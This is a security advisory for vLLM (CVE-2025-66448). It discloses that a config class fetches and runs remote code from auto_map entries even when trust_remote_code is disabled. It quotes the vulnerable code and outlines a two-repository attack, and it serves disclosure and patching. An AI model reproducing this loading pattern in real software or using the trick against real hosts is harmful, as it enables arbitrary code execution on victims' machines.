ghsa-8fr4-5q9j-m8gm
Vulnerability from github
Published
2025-12-02 17:34
Modified
2025-12-02 17:34
Summary
vLLM vulnerable to remote code execution via transformers_utils/get_config
Details

Summary

vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host.

Details

The vulnerable code resolves and instantiates classes from auto_map entries without checking whether those entries point to a different repo or whether remote code execution is allowed.

```python class Nemotron_Nano_VL_Config(PretrainedConfig): model_type = 'Llama_Nemotron_Nano_VL'

def __init__(self, **kwargs):
    super().__init__(**kwargs)

    if vision_config is not None:
        assert "auto_map" in vision_config and "AutoConfig" in vision_config["auto_map"]
        # <-- vulnerable dynamic resolution + instantiation happens here
        vision_auto_config = get_class_from_dynamic_module(*vision_config["auto_map"]["AutoConfig"].split("--")[::-1])
        self.vision_config = vision_auto_config(**vision_config)
    else:
        self.vision_config = PretrainedConfig()

```

get_class_from_dynamic_module(...) is capable of fetching and importing code from the Hugging Face repo specified in the mapping. trust_remote_code is not enforced for this code path. As a result, a frontend repo can redirect the loader to any backend repo and cause code execution, bypassing the trust_remote_code guard.

Impact

This is a critical vulnerability because it breaks the documented trust_remote_code safety boundary in a core model-loading utility. The vulnerable code lives in a common loading path, so any application, service, CI job, or developer machine that uses vllm’s transformer utilities to load configs can be affected. The attack requires only two repos and no user interaction beyond loading the frontend model. A successful exploit can execute arbitrary commands on the host.

Fixes

  • https://github.com/vllm-project/vllm/pull/28126
Show details on source website


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "vllm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.11.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-66448"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-02T17:34:16Z",
    "nvd_published_at": "2025-12-01T23:15:54Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`vllm` has a critical remote code execution vector in a config class named `Nemotron_Nano_VL_Config`. When `vllm` loads a model config that contains an `auto_map` entry, the config class resolves that mapping with `get_class_from_dynamic_module(...)` and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the `auto_map` string. Crucially, this happens even when the caller explicitly sets `trust_remote_code=False` in `vllm.transformers_utils.config.get_config`. In practice, an attacker can publish a benign-looking frontend repo whose `config.json` points via `auto_map` to a separate malicious backend repo; loading the frontend will silently run the backend\u2019s code on the victim host.\n\n### Details\n\nThe vulnerable code resolves and instantiates classes from `auto_map` entries without checking whether those entries point to a different repo or whether remote code execution is allowed.\n\n```python\nclass Nemotron_Nano_VL_Config(PretrainedConfig):\n    model_type = \u0027Llama_Nemotron_Nano_VL\u0027\n\n    def __init__(self, **kwargs):\n        super().__init__(**kwargs)\n\n        if vision_config is not None:\n            assert \"auto_map\" in vision_config and \"AutoConfig\" in vision_config[\"auto_map\"]\n            # \u003c-- vulnerable dynamic resolution + instantiation happens here\n            vision_auto_config = get_class_from_dynamic_module(*vision_config[\"auto_map\"][\"AutoConfig\"].split(\"--\")[::-1])\n            self.vision_config = vision_auto_config(**vision_config)\n        else:\n            self.vision_config = PretrainedConfig()\n```\n\n`get_class_from_dynamic_module(...)` is capable of fetching and importing code from the Hugging Face repo specified in the mapping. `trust_remote_code` is not enforced for this code path. As a result, a frontend repo can redirect the loader to any backend repo and cause code execution, bypassing the `trust_remote_code` guard.\n\n### Impact\n\nThis is a critical vulnerability because it breaks the documented `trust_remote_code` safety boundary in a core model-loading utility. The vulnerable code lives in a common loading path, so any application, service, CI job, or developer machine that uses `vllm`\u2019s transformer utilities to load configs can be affected. The attack requires only two repos and no user interaction beyond loading the frontend model. A successful exploit can execute arbitrary commands on the host.\n\n### Fixes\n\n* https://github.com/vllm-project/vllm/pull/28126",
  "id": "GHSA-8fr4-5q9j-m8gm",
  "modified": "2025-12-02T17:34:16Z",
  "published": "2025-12-02T17:34:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-8fr4-5q9j-m8gm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66448"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/pull/28126"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vllm-project/vllm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vLLM vulnerable to remote code execution via transformers_utils/get_config"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.


Loading…

Loading…